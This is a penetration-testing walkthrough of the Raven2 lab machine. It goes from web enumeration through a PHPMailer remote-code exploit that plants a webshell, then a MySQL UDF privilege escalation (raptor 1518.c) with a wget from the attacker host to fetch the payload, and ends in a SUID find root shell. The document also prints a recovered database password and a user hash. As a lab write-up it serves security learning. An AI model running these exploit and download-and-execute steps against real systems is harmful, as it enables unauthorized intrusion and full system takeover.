Raven2
Information collection
Survival detection
Detailed scan
Background scanning
dirsearch -u http://10.4.7.135 -x 403 # Filter background pages with status code 403
Webshell
Vulnerability discovery
-
Access the scanned background page
/vendor page
Found that the website uses PHPMailer
PHPMailer is a PHP library for sending emails. It provides a simple and flexible way to send emails, supports SMTP, POP3 and IMAP protocols, and supports attachments, HTML content, email authentication and other functions. PHPMailer can be used with most mainstream mail servers and mail service providers and is one of the commonly used mail sending tools in PHP development.
Check the VERSION file and find that the version is 5.2.16
Exploiting vulnerabilities
-
Search for vulnerabilities
serachsploit phpmailer
download
searchsploit -m 40974.py
-
View the attack script and modify it
-
Modify the target IP and add the vulnerable php page.
-
Modify kali ip
-
Change the location where the backdoor program is stored
Save and exit. The vulnerable web page is in contact.php. Running this attack file will automatically generate a backdoor file icepeak.php in the root directory of the website.
-
-
run script
python 40974.py
File generated successfully
-
kali turns on nc monitoring
-
Access the webshell file generated by the script on the website
http://10.4.7.135/backdoor.php
-
Successfully obtained Webshell
Elevation of privilege
Preparation for privilege escalation
-
The database account password was found in the wp configuration file wp-config file in the /var/www/html/wordpress directory.
Account
root
Password
R@v3nSecurity
-
Try to log into the database
mysql -uroot -pR@v3nSecurity
-
Check the contents in the database and find two users
michael
P
P
PBjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0
steven LOLLOL1
-
You can use steven to log in to the backend
Useless
-
Utilize tool LinEnum (Linux enumeration and privilege escalation checking tool)
Link: https://pan.baidu.com/s/1AT3PKicE05u6PsykiwCt-g?pwd=s8dt
Extraction code: s8dt
You can see that the MySQL service is running as root
UDF privilege escalation
UDF rights promotion prerequisites
The secure_file_priv item of the mysql configuration file is set to empty (if the directory is specified as NULL or /tmp/, etc., that is, the udf file export location cannot be customized and cannot be used).
show variables like '%secure%'
; View the exportable file locationCREATE permissions, FILE permissions (root user has all permissions by default).
Linux systems require write permissions for the plugin directory.
UDF privilege escalation in the Linux environment is most likely limited to the shooting range environment. The reason: under the strict system permissions of Linux, the mysql user or web user does not have write permissions to the plugin directory.
UDF privilege escalation principle
In the MySQL database, the implementation of UDF functions usually requires the creation of a dynamic link library file (also called a plug-in file or plugin file). A dynamic link library is an executable file that can be dynamically loaded into memory when the program is running, linked with the program, and provides additional functions.
UDF functions usually need to be written in a programming language such as C or C++ and compiled into a dynamic link library file. In MySQL, dynamic link library files for UDF functions usually use the .so or .dll extension. This file contains the code of the UDF function and related library files, which can be loaded and used in MySQL.
Privilege escalation process
- In Windows, Mysql is generally executed with System permissions. Therefore, the UDF privilege escalation vulnerability occurs mainly because the root user password is leaked, weak passwords, etc., or ordinary users have write permissions to folders such as plugins.
- Mysql’s main program mysqld in a Linux environment generally runs with the independent account mysql, while the daemon mysqld_safe has root privileges. Therefore, there are relatively few opportunities for UDF privilege escalation under Linux. UDF privilege escalation will only occur when the mysqld process is executed as root.
- For versions of MySQL >= 5.1, the UDF dynamic link library file must be placed in the lib\plugin folder in the MySQL installation directory to create a custom function. Generally, sqlmap and Metasploit come with dynamic link library files corresponding to the system. However, these dynamic link libraries included in sqlmap have been encoded to prevent accidental killing and cannot be used directly. However, you can use the decoding tool cloak.py that comes with sqlmap to decode it.
-
View the permissions of the current database user
select * from mysql.user where user = substring_index(user(), '@', 1)\G;
Implementation
-
Find plugin file location
find / -name plugin
-
searchsploit searches for mysql udf vulnerability script and downloads it
searchsploit mysql udf searchsploit -m 1518.c
-
View how to use the vulnerability script
* Usage: *$id * uid=500(raptor) gid=500(raptor) groups=500(raptor) * $ gcc -g -c 1518.c # The -g option is used to generate debugging information during the compilation process to debug when the program errors. # The -c option is used to compile the source code into an object file without linking. Compiled object files generally have an extension of .o or .obj. * $ gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.o -lc # Link the 1518.o object file with the C standard library and generate a dynamic link library file named 1518.so. * $ mysql -uroot -pR@v3nSecurity *[...] * python -c 'import pty;pty.spawn("/bin/bash")' * mysql> use mysql; * mysql> create table foo(line blob); # Create a table named zwt in the current database. The table has only one column named line and the data type is blob (binary large object). * mysql> insert into foo values(load_file('/tmp/1518.so')); # Insert a record into the zwt table. The value of the record is the content of the /tmp/1518.so file loaded through the load_file function. The load_file function is used to read the file content and return its binary data. * mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so'; # Save the output of the 1518.so file downloaded under /tmp to the /usr/lib/mysql/plugin dynamic link library directory * mysql> create function do_system returns integer soname '1518.so'; # Create a MySQL function named do_system, which uses the dynamic link library named 1518.so as its implementation * mysql> select * from mysql.func; # View detailed information of the created function * + ---------- + ----- + ---------------- + ---------- + * | name | ret | dl | type | * + ---------- + ----- + ---------------- + ---------- + * | do_system | 2 | 1518.so | function | * + ---------- + ----- + ---------------- + ---------- + * mysql> select do_system('chmod u + s /usr/bin/find'); * find ./ aaa -exec '/bin/sh' \; * sh-2.05b$ cat /tmp/out * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm) *[...] * * E-DB Note: Keep an eye on https://github.com/mysqludf/lib_mysqludf_sys
-
kali compilation
-
Target drone echo
python -c 'import pty;pty.spawn("/bin/bash")'
-
Target drone download 1518.so
cd /tmp wget http://10.4.7.132/1518.so
-
dynamic link library
mysql -uroot -pR@v3nSecurity use mysql; create table foo(line blob); insert into foo values(load_file('/tmp/1518.so')); select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so'; create function do_system returns integer soname '1518.so'; select * from mysql.func;
-
Execute system commands to grant suid permissions
select do_system('chmod u + s /usr/bin/find');
-
find privilege escalation
find / abc -exec '/bin/sh' \; # \;: Indicates the end symbol of the command. It tells the find command to execute the command once after each matched file or directory.
Successfully obtained root privileges
Summary
- Dynamic link library udf privilege escalation
- find privilege escalation
- suid